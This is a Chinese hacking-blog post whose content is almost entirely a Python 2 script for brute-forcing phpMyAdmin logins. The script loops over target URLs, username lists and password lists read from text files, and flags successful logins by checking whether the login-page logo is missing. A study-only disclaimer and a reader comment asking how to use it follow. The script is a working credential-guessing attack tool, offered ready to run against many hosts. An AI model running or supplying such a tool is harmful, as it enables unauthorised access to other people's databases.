phpMyAdmin数据库爆破python脚本

  • 内容
  • 相关
#!usr/bin/env python
#encoding: utf-8

import requests



headers = {'Content-Type':'application/x-www-form-urlencoded',
        'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
        'Cookie':'pmaCookieVer=5; pma_lang=zh_CN; pma_collation_connection=utf8mb4_unicode_ci; phpMyAdmin=vo6nt8q71hsv93fb9a7c5b5oot2215gq'
        }
def attack(host,username,password):
    host = host + "/index.php"
    payload ={'pma_username':username,
          'pma_password':password,
          'server':'1',
          'target':'index.php',
          'token':'bf8e4192569617d39070c5739cd1776f'}
    try:
        html = requests.post(host,headers=headers,data=payload).text        
        if "themes/pmahomme/img/logo_right.png" in html:
            print "[-] %s-%s"%(username,password)
        else:
            print "[+] %s-%s-%s"%(host,username,password)
    except Exception as e:
        pass

with open('./url.txt','r') as url:
    host_t = url.readlines()
    with open('./username.txt','r') as username:
        username_t = username.readlines()
        with open('./password.txt','r') as password:
            password_t = password.readlines()
            for h in host_t:
                host = h.strip()
                for u in username_t:
                    username = u.strip()
                    for p in password_t:
                        password = p.strip()
                        attack(host,username,password)

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:phpMyAdmin数据库爆破python脚本 - https://www.0dayhack.com/post-848.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

1条评论
  1. avatar

    huige Lv.1 Chrome 55.0.2883.87 Chrome 55.0.2883.87 Windows Windows 回复

    怎么用的

    上海市长宁区 /普陀区电信